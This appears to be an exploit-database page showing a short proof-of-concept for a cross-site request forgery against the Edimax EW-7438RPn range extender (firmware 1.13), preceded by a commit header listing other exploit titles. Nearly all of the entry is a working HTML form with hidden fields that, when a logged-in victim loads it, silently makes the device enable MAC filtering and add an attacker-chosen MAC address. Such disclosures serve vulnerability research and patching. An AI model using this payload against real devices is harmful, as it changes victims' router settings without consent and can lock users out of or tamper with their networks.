7b676133d3
5 changes to exploits/shellcodes Vesta Control Panel 0.9.8-16 - Local Privilege Escalation RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) Edimax EW-7438RPn - Information Disclosure (WiFi Password) Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering) Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
32 lines
No EOL
1.2 KiB
Text
32 lines
No EOL
1.2 KiB
Text
# Exploit Title: Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering)
|
|
# Date: 2020-04-21
|
|
# Exploit Author: Besim ALTINOK
|
|
# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/
|
|
# Version:1.13
|
|
# Tested on: Edimax EW-7438RPn 1.13 Version
|
|
|
|
|
|
CSRF PoC - Mac Filtering
|
|
----------------------------------------------------------------------------------------------------------
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://172.20.10.2/goform/formWlAc" method="POST">
|
|
<input type="hidden" name="wlanAcEnabled" value="ON" />
|
|
<input type="hidden" name="tiny_idx" value="0" />
|
|
<input type="hidden" name="mac" value="ccbbbbbbbbbb" />
|
|
<input type="hidden" name="comment" value="PentesterTraining" />
|
|
<input type="hidden" name="addFilterMac" value="Add" />
|
|
<input type="hidden" name="submit-url"
|
|
value="/macfilter1_sub1.asp" />
|
|
<input type="hidden" name="wlanSSIDIndex" value="1" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
--
|
|
|
|
Besim ALTINOK
|
|
|
|
*Security Engineer* |